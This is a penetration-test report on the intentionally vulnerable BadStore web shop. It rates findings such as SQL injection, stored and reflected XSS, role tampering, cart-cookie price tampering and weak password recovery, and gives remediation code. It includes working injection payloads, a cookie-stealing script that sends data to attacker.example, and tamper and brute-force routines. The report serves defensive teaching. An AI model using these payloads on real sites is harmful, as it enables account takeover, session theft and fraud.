BadStore Webapp Report
1 Sensitive Data Exposure
#Severity :
HIGH
#Ease Of Exploitation :
EASY
#Affected URL/Device :
#Analysis :
It was observed that the web application serves every request over plain
HTTP with no transport encryption. Anyone on the network path can intercept,
read and modify requests and responses. Sensitive data such as passwords and
credit card numbers is transmitted in clear text.
#Impact :
An attacker on the same network (or anywhere on the path between client
and server) can sniff traffic and capture login credentials and credit card
details, or mount a man-in-the-middle attack and alter pages and form
submissions. Nothing beyond a packet capture or an intercepting proxy is needed.
#Recommendation :
Serve the entire application over TLS (HTTPS) using a certificate issued
by a trusted CA and only strong cipher suites; redirect HTTP to HTTPS and send a
Strict-Transport-Security header so browsers never fall back to clear text. This
removes passive sniffing and makes an active man-in-the-middle detectable.
2 Security Misconfiguration
2.1 Directory Listing Enabled
#Severity
LOW
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
Directory listing is enabled. A listing reveals hidden scripts, include
files, backup source files and similar content that can then be downloaded and
read.
The listing of the supplier directory contains an accounts file holding
supplier IDs and credentials. The credentials are only base64 encoded, which is
trivially reversible, so they are effectively stored in plain text. From this
file we recovered the username and password of supplier joe:
platnum
#Impact
Leakage of information and of the directory structure. An attacker learns
about hidden files and folders that may contain sensitive data such as backups,
credential files or source code, as the supplier accounts file demonstrates.
#Recommendation
Disable directory listing (Options -Indexes in httpd.conf or an .htaccess
file), remove the accounts file and any backups from the web root, and store
credentials hashed rather than base64 encoded.
2.2 Application Error Disclosure
#Severity
LOW
#Ease Of Exploitation
EASY
#Affected URL/Device
and any other URL that is broken: every broken URL returns the same error
page, which gives the information needed for basic fingerprinting
#Analysis
This page returns an error/warning message that discloses internal
details, such as the location of the file that produced the unhandled
exception. Such information can be used to plan further attacks against the web
application. In this case the error page reveals the server banner
Apache/1.3.28 Server at 192.168.0.104 Port 80. This confirms the exact web
server version and is directly useful for fingerprinting and for selecting
version-specific exploits (see finding 3).
#Impact
The attacker gains additional information about the target, which makes
fingerprinting the web server and application easier.
#Recommendation
Replace default error pages with generic custom ones, turn off the server
signature and version banner (ServerSignature Off, ServerTokens Prod), and
disable diagnostic/debugging output in production.
2.3 Robots.txt is not protected
#Severity
LOW
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
Robots.txt is a file that tells crawlers which parts of a website may be
crawled and indexed and which may not. It is also a common source of
information leakage: the file is world-readable by design, so anyone can open
it and read the list of directories the site owner wanted to keep out of
search engines.
#Impact
Users can easily find out which directories are interesting and were not
meant to be widely known, which reduces the effort of mapping the web
application. In this case /backup, /upload, /supplier, /cgi-bin and /scanbot
are all listed and likely to contain useful information.
#Recommendation
Do not list sensitive paths in robots.txt; the file has to stay readable
for crawlers to honour it, so it cannot hide anything. Instead protect the
directories themselves with authentication (e.g. an .htaccess file with basic
authentication or a deny rule) and keep backups out of the web root altogether.
3 Using Components with Known Vulnerabilities
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
http://192.168.0.104/
#Analysis
Apache/1.3.28 is an end-of-life release with multiple publicly known
remote code execution and buffer overflow vulnerabilities for which working
exploits exist.
#Impact
Successful exploitation results in remote code execution on the web
server, or in denial of service by crashing the Apache process.
#Recommendation
Upgrade Apache to a current, supported release (the 1.3 branch is no
longer maintained) and keep it patched; remove the version banner as described
in 2.2 so the version cannot be read off error pages.
4. SQL Injection
#Severity
HIGH
#Ease Of Exploitation
Medium
#Affected URL/Device
#Analysis
It was observed that the above URL and its parameters, as well as the
email and password fields of the login form, are vulnerable to SQL injection.
Query :
http://192.168.0.104/cgi-bin/badstore.cgi?searchquery=%27+or+1%3D1+union+select+database%28%29%2Cnull%2Cnull%2Cnull+%23&action=search&x=0&y=0
The response includes the database name returned by database(), confirming
that injected SQL is executed; the UNION pads with three NULLs because the
original search query selects four columns.
Authentication can also be bypassed: entering ' or 1=1# in both the email
and password fields makes the WHERE clause always true and logs us in as the
first user in the table,
the test user.
#Impact
Successful exploitation results in compromise of the entire database
(reading and possibly modifying every table, including customer credentials
and card data) and in authentication bypass.
#Recommendation
- Use prepared statements (parameterised queries) for every query that includes user input
- Stored procedures only help if they do not build dynamic SQL internally
- Validate input against a whitelist and run the application with a least-privilege database account
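The two injections above, reproduced against a throwaway SQLite database as an added example (this is not BadStore's Perl code and the tables, users and items are constructed for the example). SQLite has no '#' comment, so '--' stands in for the '#' in the report's payloads, and sqlite_version() stands in for MySQL's database(). The vulnerable functions build SQL by string concatenation exactly as the report describes; the safe ones bind the same input as parameters and return nothing for the attack strings.

```python
import sqlite3

# Constructed sample data, not the BadStore database. The first user stands in
# for the "test" user the report says the login bypass ends up as.
USERS = [
    ("test", "test@example.com", "test123"),
    ("joe", "joe@example.com", "platnum"),
]
ITEMS = [
    (1000, "Snake Oil", 12, "cures everything"),
    (1003, "Magic Beans", 12, "just add water"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, price INTEGER, descr TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?, ?)", ITEMS)
    return conn


def vulnerable_login(conn, email, passwd):
    """Query built by string concatenation: the first matching row wins."""
    sql = ("SELECT username FROM users WHERE email = '" + email
           + "' AND passwd = '" + passwd + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def vulnerable_search(conn, term):
    """Four-column SELECT, which is why the report's UNION payload pads the
    injected SELECT with three NULLs."""
    sql = ("SELECT id, name, price, descr FROM items WHERE name LIKE '%"
           + term + "%'")
    return conn.execute(sql).fetchall()


def safe_login(conn, email, passwd):
    """Parameterised query: the driver binds the input as data, never as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE email = ? AND passwd = ?",
        (email, passwd),
    ).fetchone()
    return row[0] if row else None


def safe_search(conn, term):
    return conn.execute(
        "SELECT id, name, price, descr FROM items WHERE name LIKE ?",
        ("%" + term + "%",),
    ).fetchall()


# The report's payloads with '--' in place of MySQL's '#' comment.
LOGIN_BYPASS = "' OR 1=1 --"
UNION_PAYLOAD = "' OR 1=1 UNION SELECT sqlite_version(), NULL, NULL, NULL --"


def leaked_version(rows):
    """True if the UNION payload smuggled the server version into the results."""
    return any(r[0] == sqlite3.sqlite_version for r in rows)


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, LOGIN_BYPASS, LOGIN_BYPASS))      # test
    print(safe_login(db, LOGIN_BYPASS, LOGIN_BYPASS))            # None
    print(leaked_version(vulnerable_search(db, UNION_PAYLOAD)))  # True
    print(leaked_version(safe_search(db, UNION_PAYLOAD)))        # False
```

The safe variants change nothing about the query logic; they only stop the input from being parsed as SQL, which is why parameterisation is the first recommendation above and whitelisting only a second line of defence.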
5. XSS (Cross site scripting)
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
http://192.168.0.104/cgi-bin/badstore.cgi?action=doguestbook
#Analysis
Reflected XSS is present in the searchquery parameter: the search term is
written back into the page unencoded, so an attacker can craft a link that
executes arbitrary script in the victim's browser.
Stored XSS is also present in the guestbook (doguestbook): a script placed in
a guestbook entry runs for every visitor who views it, which is more severe
than reflected XSS because no crafted link is needed.
#Impact
Successful exploitation lets the attacker steal session cookies and hijack
user sessions (see 7.1). With a browser-hooking framework such as BeEF the
victim's browser can be driven further (phishing, keylogging, probing the
internal network), which can lead to a wider compromise.
#Recommendation
Encode user-controlled data for the context it is written into (HTML-entity
encode it in the page body and in attributes) using an established anti-XSS
library rather than hand-written regular expressions, validate input against a
whitelist, and set the HttpOnly flag on session cookies so a successful
injection cannot read them.
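Output encoding for the two contexts found above (stored guestbook entries and the reflected search term), as an added example written for this report rather than code from BadStore. The guestbook entries and the search payload are constructed; html.escape is Python's standard-library entity encoder and is the right tool for HTML body and attribute contexts only (a value written into JavaScript or a URL needs a different encoder).

```python
import html

# Constructed guestbook entries and search term, not data from the report's
# BadStore instance. The second entry is a cookie-stealing stored payload.
GUESTBOOK = [
    ("Joe Shopper", "Great store!"),
    ("evil", "<script>new Image().src='http://attacker.example/?c='"
             "+document.cookie</script>"),
]
REFLECTED = '"><script>alert(document.cookie)</script>'


def render_guestbook_vulnerable(entries):
    """Writes user data into the page unencoded: the stored payload runs for
    every visitor, including an administrator reading the guestbook."""
    return "".join(f"<p><b>{name}</b>: {msg}</p>" for name, msg in entries)


def render_guestbook_safe(entries):
    """HTML-entity encodes every user-controlled value at output time."""
    return "".join(
        f"<p><b>{html.escape(name)}</b>: {html.escape(msg)}</p>"
        for name, msg in entries
    )


def render_search_vulnerable(term):
    """Reflects the search term into an attribute and into text unencoded."""
    return f'<input name="searchquery" value="{term}"><p>Results for {term}</p>'


def render_search_safe(term):
    """The term appears inside a quoted attribute and in body text, so the
    quote characters must be encoded too (html.escape does so by default)."""
    safe = html.escape(term, quote=True)
    return f'<input name="searchquery" value="{safe}"><p>Results for {safe}</p>'


def has_script_tag(page):
    """Crude check: does a live <script> element survive rendering?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(has_script_tag(render_guestbook_vulnerable(GUESTBOOK)))  # True
    print(has_script_tag(render_guestbook_safe(GUESTBOOK)))        # False
    print(render_search_safe(REFLECTED))
```

Note that the encoding happens when the value is written into the page, not when it is stored: the guestbook can keep the raw text, and the same stored entry is safe on every page that encodes it and dangerous on any page that does not.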
6. Insecure Direct Object Reference
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
The action parameter is trusted as-is: by guessing action names and
passing them directly, we can invoke functionality without any validation or
authorization check (strictly speaking, missing function-level access
control). This lets us skip the credit card payment step and place orders
without paying, and it also gives access to the hidden admin portal.
#Impact
Allows users to bypass workflow steps and reach restricted areas of the
site. For an e-commerce application, bypassing payment and still placing
orders is disastrous, so the financial impact is very high.
#Recommendation
Enforce authentication and authorization for every action on the server
side: check the user's role and the order state (paid or not) in code before
executing the action, at the URL, body and function level, rather than relying
on the client not knowing the action name.
7. Broken Authentication and Session Management
#Severity
HIGH
#Ease Of Exploitation
MEDIUM
#Affected URL/Device
#Analysis
It is observed that when creating a new user, a hidden field named role is
submitted with the values U (user), A (admin) and S (supplier). Changing this
field in an intercepting proxy registers the account as admin or supplier
without any validation or authorization. Thus anyone can become admin.
#Impact
Malicious users can register as admin and gain all privileges over the
web application, resulting in its complete compromise.
#Recommendation
A newly registered user must always receive the lowest privilege (User in
this case); the server should assign the role itself and ignore any role value
sent by the client. If needed, an administrator can raise the privilege later.
The user registration module itself is flawed and must be fixed.
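Server-side enforcement for findings 6 and 7 together, as an added example that is not BadStore's code: registration assigns the role itself and discards the hidden role field, every action passes through one authorization check keyed on the session role, and the order action refuses a cart that was never paid for. The action names other than those quoted in this report (search, doguestbook) and the card_ok payment result are constructed for the example.

```python
ROLE_USER, ROLE_ADMIN, ROLE_SUPPLIER = "U", "A", "S"


class Forbidden(Exception):
    pass


def register(form, users):
    """Creates an account from a registration form. The server assigns the
    role; a client-supplied 'role' field (the hidden field the report found)
    is ignored, so changing it in a proxy has no effect."""
    user = {"email": form["email"], "passwd": form["passwd"], "role": ROLE_USER}
    users[user["email"]] = user
    return user


# Roles allowed to call each action; None means an anonymous visitor. Names
# other than search and doguestbook are constructed for this example.
ACTION_ROLES = {
    "search": {None, ROLE_USER, ROLE_ADMIN, ROLE_SUPPLIER},
    "doguestbook": {None, ROLE_USER, ROLE_ADMIN, ROLE_SUPPLIER},
    "checkout": {ROLE_USER, ROLE_ADMIN},
    "placeorder": {ROLE_USER, ROLE_ADMIN},
    "supplierupload": {ROLE_SUPPLIER},
    "admin": {ROLE_ADMIN},
}


def authorize(session, action):
    """Function-level access control, applied before any handler runs.
    Unknown actions are refused rather than passed through."""
    allowed = ACTION_ROLES.get(action)
    if allowed is None:
        raise Forbidden(f"unknown action {action!r}")
    if session.get("role") not in allowed:
        raise Forbidden(f"role {session.get('role')!r} may not call {action!r}")


def search(session, form):
    return "results for " + form.get("searchquery", "")


def doguestbook(session, form):
    return "guestbook"


def checkout(session, form):
    """Stands in for the card payment step. Proof of payment is recorded in
    the server-side session, which the client cannot edit."""
    if form.get("card_ok"):  # assumed: outcome of a real payment gateway call
        session["paid_cart"] = session.get("cart")
        return "paid"
    return "declined"


def placeorder(session, form):
    """Workflow check: the order is refused unless this exact cart was paid
    for, which closes the report's payment bypass."""
    if session.get("paid_cart") is None or session["paid_cart"] != session.get("cart"):
        raise Forbidden("cart has not been paid for")
    session["paid_cart"] = None  # a payment covers one order only
    return "ordered " + session["cart"]


def admin(session, form):
    return "admin portal"


HANDLERS = {
    "search": search, "doguestbook": doguestbook, "checkout": checkout,
    "placeorder": placeorder, "admin": admin,
}


def dispatch(session, action, form=None):
    """Every request is authorized first, whatever the action string says."""
    authorize(session, action)
    return HANDLERS[action](session, form or {})


def attempt(session, action, form=None):
    """Convenience wrapper that turns a refusal into a result string."""
    try:
        return dispatch(session, action, form)
    except Forbidden as exc:
        return f"FORBIDDEN: {exc}"


if __name__ == "__main__":
    users = {}
    print(register({"email": "x@example.com", "passwd": "pw", "role": "A"}, users))
    sess = {"role": ROLE_USER, "cart": "1000:1003"}
    print(attempt(sess, "placeorder"))                      # FORBIDDEN
    print(attempt(sess, "checkout", {"card_ok": True}))     # paid
    print(attempt(sess, "placeorder"))                      # ordered 1000:1003
    print(attempt(sess, "admin"))                           # FORBIDDEN
```

The two decisions that matter are that the role lives only in server state set by the server, and that the check sits in the single dispatch path rather than in each handler, so a newly added or guessed action cannot skip it.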
7.1 No HTTPonly Cookie and Weak Session ID
#Severity
MEDIUM
#Ease Of Exploitation
MEDIUM
#Affected URL/Device
#Analysis
It is observed that the cookies generated by the web application are set
without the HttpOnly or Secure flags. Because the session cookie is readable
from script, it can be stolen through the XSS found earlier with a payload that
exfiltrates document.cookie, and because Secure is not set it also travels
over plain HTTP (finding 1).
This can result in session hijacking: a user's session, and the admin
session too, can be taken over through the stored XSS in the guestbook.
It is also observed that the web application creates a very weak cart ID
that is easy to decode and manipulate.
When decoded the cart ID reads:
1444628668:2:24:1000:1003
That is, 2 items, a total of 24$, and item numbers 1000 and 1003. Changing
the 24 to 0 and re-encoding the value lets us buy the items for free, because
the server trusts the price carried in the cookie instead of recomputing it.
#Impact
As shown earlier we can register a new user as admin, and here we can
manipulate the cart ID to buy items for free. This can result in compromise of
the web application and very high financial losses for the company.
#Recommendation
Set the HttpOnly and Secure flags on every cookie when it is created.
Encoding is not a protection: either keep the cart on the server and give the
client only an opaque random ID, or sign the cart value with a server-side
secret (HMAC) and reject any value whose signature does not verify. In all
cases recompute the price from the product catalogue at checkout rather than
trusting a client-supplied total.
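A signed cart cookie and the cookie flags from the recommendation, as an added example that is not BadStore's code. The field layout ts:count:total:item:item is the one decoded in the finding; the secret key, the item prices and the cookie name are assumptions for the example. tamper_total() repeats by code what the report did by hand, so you can see the edited price being rejected.

```python
import base64
import hashlib
import hmac
import time

# Assumed server-side secret; in production load it from protected config.
SECRET = b"replace-with-32-random-bytes-from-os.urandom"
# Constructed catalogue: item numbers from the report's cart, prices assumed.
CATALOG = {1000: 12, 1003: 12}


def encode_cart(items, secret=SECRET, now=None):
    """Keeps the report's layout (ts:count:total:item:item...) but appends an
    HMAC-SHA256 tag so any edit to the fields is detected."""
    ts = int(now if now is not None else time.time())
    total = sum(CATALOG[i] for i in items)
    body = ":".join(str(x) for x in [ts, len(items), total, *items])
    tag = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(f"{body}|{tag}".encode()).decode()


def decode_cart(cookie, secret=SECRET):
    """Returns the cart dict, or None if the cookie is malformed or tampered."""
    try:
        raw = base64.urlsafe_b64decode(cookie.encode()).decode()
        body, sep, tag = raw.rpartition("|")
        if not sep:
            return None
        expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(tag, expected):  # constant-time compare
            return None
        ts, count, total, *items = (int(f) for f in body.split(":"))
    except (ValueError, UnicodeDecodeError):
        return None
    if count != len(items) or any(i not in CATALOG for i in items):
        return None
    # The price is recomputed from the catalogue; the transported total is
    # only cross-checked, never trusted.
    real_total = sum(CATALOG[i] for i in items)
    if total != real_total:
        return None
    return {"ts": ts, "items": items, "total": real_total}


def tamper_total(cookie, new_total):
    """What the report did by hand: decode, change the price field and
    re-encode, without knowing the secret (so the old tag is reused)."""
    raw = base64.urlsafe_b64decode(cookie.encode()).decode()
    body, _, tag = raw.rpartition("|")
    fields = body.split(":")
    fields[2] = str(new_total)
    return base64.urlsafe_b64encode((":".join(fields) + "|" + tag).encode()).decode()


def set_cookie_header(name, value):
    """Cookie with the flags the recommendation asks for."""
    return f"Set-Cookie: {name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    c = encode_cart([1000, 1003], now=1444628668)
    print(decode_cart(c))                   # total 24
    print(decode_cart(tamper_total(c, 0)))  # None
    print(set_cookie_header("CartID", c))
```

Signing keeps the cart stateless, which is the only reason to prefer it over a server-side cart keyed by a random ID; the price recomputation is needed either way, since the signature only proves the server produced the value, not that the catalogue has not changed since.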
7.2 Web Forms Allow Password Caching on the Client Side
#Severity
LOW
#Ease Of Exploitation
DIFFICULT
#Affected URL/Device
http://192.168.0.101/cgi-bin/badstore.cgi?action=supplierlogin
#Analysis
Most commercial and open-source web browsers let users store username and
password values for convenience, so they do not have to re-enter them every
time the same form is rendered. Although this looks like a feature for end
users, information stored on the client side cannot be trusted: credentials
cached on a shared or compromised machine can be read by anyone with access to
it, and an attacker may then replay the login and log on as the legitimate
user.
#Impact
Credentials cached on the client can be stolen if the machine is shared or
compromised, allowing an attacker to replay the authentication and log on as
the legitimate user.
#Recommendation
Developers can set autocomplete=off on the login form to ask browsers not
to store the credentials. Example: <form autocomplete=off>. Note that current
browsers ignore this attribute for password fields and rely on their own
credential managers, so treat it as a defence-in-depth measure with limited
effect, which is why this finding is rated LOW.
7.3 X Frame Option not set
#Severity
LOW
#Ease Of Exploitation
DIFFICULT
#Affected URL/Device
http://192.168.0.101/
#Analysis
It was observed that the X-Frame-Options header is not included in the HTTP
response, so nothing prevents another site from loading the application's
pages inside a frame ('clickjacking').
#Impact
Users are vulnerable to clickjacking: the attacker overlays a transparent
frame of the application on top of their own page so that the victim
unknowingly clicks the real buttons. Because the victim's own browser submits
the genuine form with its cookies and tokens, this can be used to defeat CSRF
protection.
#Recommendation
All modern web browsers support the X-Frame-Options HTTP header. Ensure it
is set on every page returned by the site: use SAMEORIGIN if you expect the
page to be framed only by pages on your own server (e.g. it is part of a
FRAMESET), otherwise use DENY if the page should never be framed. ALLOW-FROM
is obsolete and ignored by current browsers; to permit specific third-party
sites, send a Content-Security-Policy header with a frame-ancestors directive,
which also takes precedence over X-Frame-Options where supported.
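The server-side fixes recommended in findings 1 (HTTPS only), 2.1 (directory listing), 2.2 (banner and error pages), 2.3 (access control on the paths robots.txt exposes) and 7.3 (framing) collected into one Apache configuration, as an added example. This is written for Apache 2.4 with mod_ssl and mod_headers, not for the 1.3.28 in the report, which should be upgraded first (finding 3). The hostname, certificate paths, error page paths and htpasswd file are assumptions; with AllowOverride enabled the Options and Require directives could equally live in an .htaccess file as the report suggests.

```apache
# Finding 2.2: no version banner on error pages or in headers
ServerTokens Prod
ServerSignature Off
# Generic error pages (paths assumed)
ErrorDocument 404 /errors/notfound.html
ErrorDocument 500 /errors/server.html

<VirtualHost *:80>
    ServerName badstore.example
    # Finding 1: never serve the application over plain HTTP
    Redirect permanent / https://badstore.example/
</VirtualHost>

<VirtualHost *:443>
    ServerName badstore.example
    DocumentRoot /var/www/badstore

    # Finding 1: TLS with a CA-issued certificate and modern cipher suites only
    SSLEngine on
    SSLCertificateFile /etc/ssl/certs/badstore.example.crt
    SSLCertificateKeyFile /etc/ssl/private/badstore.example.key
    SSLProtocol -all +TLSv1.2 +TLSv1.3
    SSLCipherSuite ECDHE+AESGCM:ECDHE+CHACHA20
    SSLHonorCipherOrder on
    Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"

    # Finding 7.3: refuse framing by other origins (CSP is the current form)
    Header always set X-Frame-Options "SAMEORIGIN"
    Header always set Content-Security-Policy "frame-ancestors 'self'"

    # Finding 2.1: no directory listings anywhere under the document root
    <Directory /var/www/badstore>
        Options -Indexes
        AllowOverride None
        Require all granted
    </Directory>

    # Finding 2.3: the paths robots.txt advertises get real access control
    <Directory /var/www/badstore/supplier>
        AuthType Basic
        AuthName "Supplier area"
        AuthUserFile /etc/apache2/supplier.htpasswd
        Require valid-user
    </Directory>
    <Directory /var/www/badstore/backup>
        Require all denied
    </Directory>
</VirtualHost>
```

Basic authentication is only acceptable because the whole site is now behind TLS; over the plain HTTP of finding 1 it would send the supplier password base64 encoded on every request, which is exactly the weakness found in the accounts file.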
7.4 Emails Found
#Severity
LOW
#Ease Of Exploitation
DIFFICULT
#Affected URL/Device
http://192.168.0.101/
#Analysis
While crawling the web application we found multiple e-mail addresses that
can be used for social engineering or to guess usernames for credential
harvesting.
#Impact
Gathered e-mail addresses can be used in social engineering attacks, and
usernames for the login form can be guessed from them.
#Recommendation
Train staff to recognise social engineering attacks, avoid publishing
personal e-mail addresses on the site, and keep login usernames different from
e-mail addresses.
8. File Upload
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
It is observed that the web application lets a supplier upload any file as
a price list, with no check on its type or content. A malicious supplier (or
anyone who became a supplier through finding 7) can upload a web shell such
as a PHP script and compromise the application and the entire server.
#Impact
Remote code execution on the web server, resulting in compromise of the
entire web application, its database and the host.
#Recommendation
Validate the uploaded file on the server: allow only the expected types
(e.g. txt, csv) by checking both the extension and the actual content, never
the client-supplied MIME type alone, since that header is attacker-controlled.
Never accept PHP, CGI or other executable files. Store uploads under a
server-generated name outside the web root, with read-only permissions and no
execute bit, and serve them as downloads rather than through the script
handler.
9. Weak Password Recovery Mechanism
#Severity
HIGH
#Ease Of Exploitation
EASY
#Affected URL/Device
#Analysis
It is observed that the password recovery mechanism is very weak and can
be bypassed with a handful of guesses. All that is needed is the user's full
name and e-mail address, both of which can be found in the guestbook entries.
The only secret is the user's favourite colour, which has a tiny answer space,
so it can be brute-forced with Burp Repeater or any scripted loop.
In this way we successfully logged in as Joe Shopper by guessing his
favourite colour as green. The password recovery mechanism therefore provides
no real protection.
#Impact
Allows malicious users to log in as other users, impersonate them and make
purchases on their behalf, resulting in compromise of customer accounts.
#Recommendation
- Apply a lockout policy that locks the account (or at least the recovery function) after a few failed attempts
- Use anti-automation such as CAPTCHA and rate limiting
- Replace the current scheme, which is far too weak: send a random single-use reset token to the account's registered e-mail address instead of asking a guessable question
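The brute force from the finding and the first and third recommendations side by side, as an added example rather than BadStore code. The account, colour list and lockout threshold are constructed; the token functions show the replacement scheme, with only a hash of the token kept server-side and the token itself meant to go out by e-mail.

```python
import hashlib
import secrets

# Constructed data: an attacker's colour wordlist and one account in the
# report's scheme (full name + e-mail + favourite colour).
COLOUR_GUESSES = ["red", "blue", "yellow", "black", "white", "green", "orange"]
ACCOUNTS = {"joe@example.com": {"name": "Joe Shopper", "colour": "green"}}


def recover_unprotected(accounts, email, name, colour):
    """The report's scheme: a correct name and colour unlock the account."""
    acct = accounts.get(email)
    return bool(acct and acct["name"] == name and acct["colour"] == colour)


class RecoveryService:
    """Same question with a per-account lockout, plus a token-based reset."""

    def __init__(self, accounts, max_attempts=3):
        self.accounts = accounts
        self.max_attempts = max_attempts
        self.failures = {}
        self.locked = set()

    def attempt(self, email, name, colour):
        if email in self.locked:
            return "locked"
        if recover_unprotected(self.accounts, email, name, colour):
            self.failures.pop(email, None)
            return "reset"
        n = self.failures.get(email, 0) + 1
        self.failures[email] = n
        if n >= self.max_attempts:
            self.locked.add(email)
            return "locked"
        return "denied"

    def issue_token(self, email):
        """Replacement scheme: a random single-use token, stored hashed. The
        token is returned here only so it can be e-mailed; a real response
        page must not show it."""
        token = secrets.token_urlsafe(32)
        self.accounts[email]["reset_hash"] = hashlib.sha256(token.encode()).hexdigest()
        return token

    def redeem_token(self, email, token):
        acct = self.accounts.get(email, {})
        expected = acct.get("reset_hash")
        if expected is None:
            return False
        given = hashlib.sha256(token.encode()).hexdigest()
        if not secrets.compare_digest(given, expected):
            return False
        del acct["reset_hash"]  # single use
        return True


def brute_force(try_colour, guesses=COLOUR_GUESSES):
    """The Burp Repeater loop from the finding: returns the colour that worked,
    or None if every guess failed."""
    for colour in guesses:
        if try_colour(colour):
            return colour
    return None


if __name__ == "__main__":
    print(brute_force(lambda c: recover_unprotected(
        ACCOUNTS, "joe@example.com", "Joe Shopper", c)))  # green
    svc = RecoveryService({"joe@example.com": dict(ACCOUNTS["joe@example.com"])})
    print(brute_force(lambda c: svc.attempt(
        "joe@example.com", "Joe Shopper", c) == "reset"))  # None, account locked
```

The lockout only raises the cost of a seven-word guess; the token scheme removes the guess entirely, since 32 random bytes cannot be enumerated and a failed redeem does not consume the token. Rate limiting and CAPTCHA then protect the e-mail lookup itself from being used to enumerate accounts.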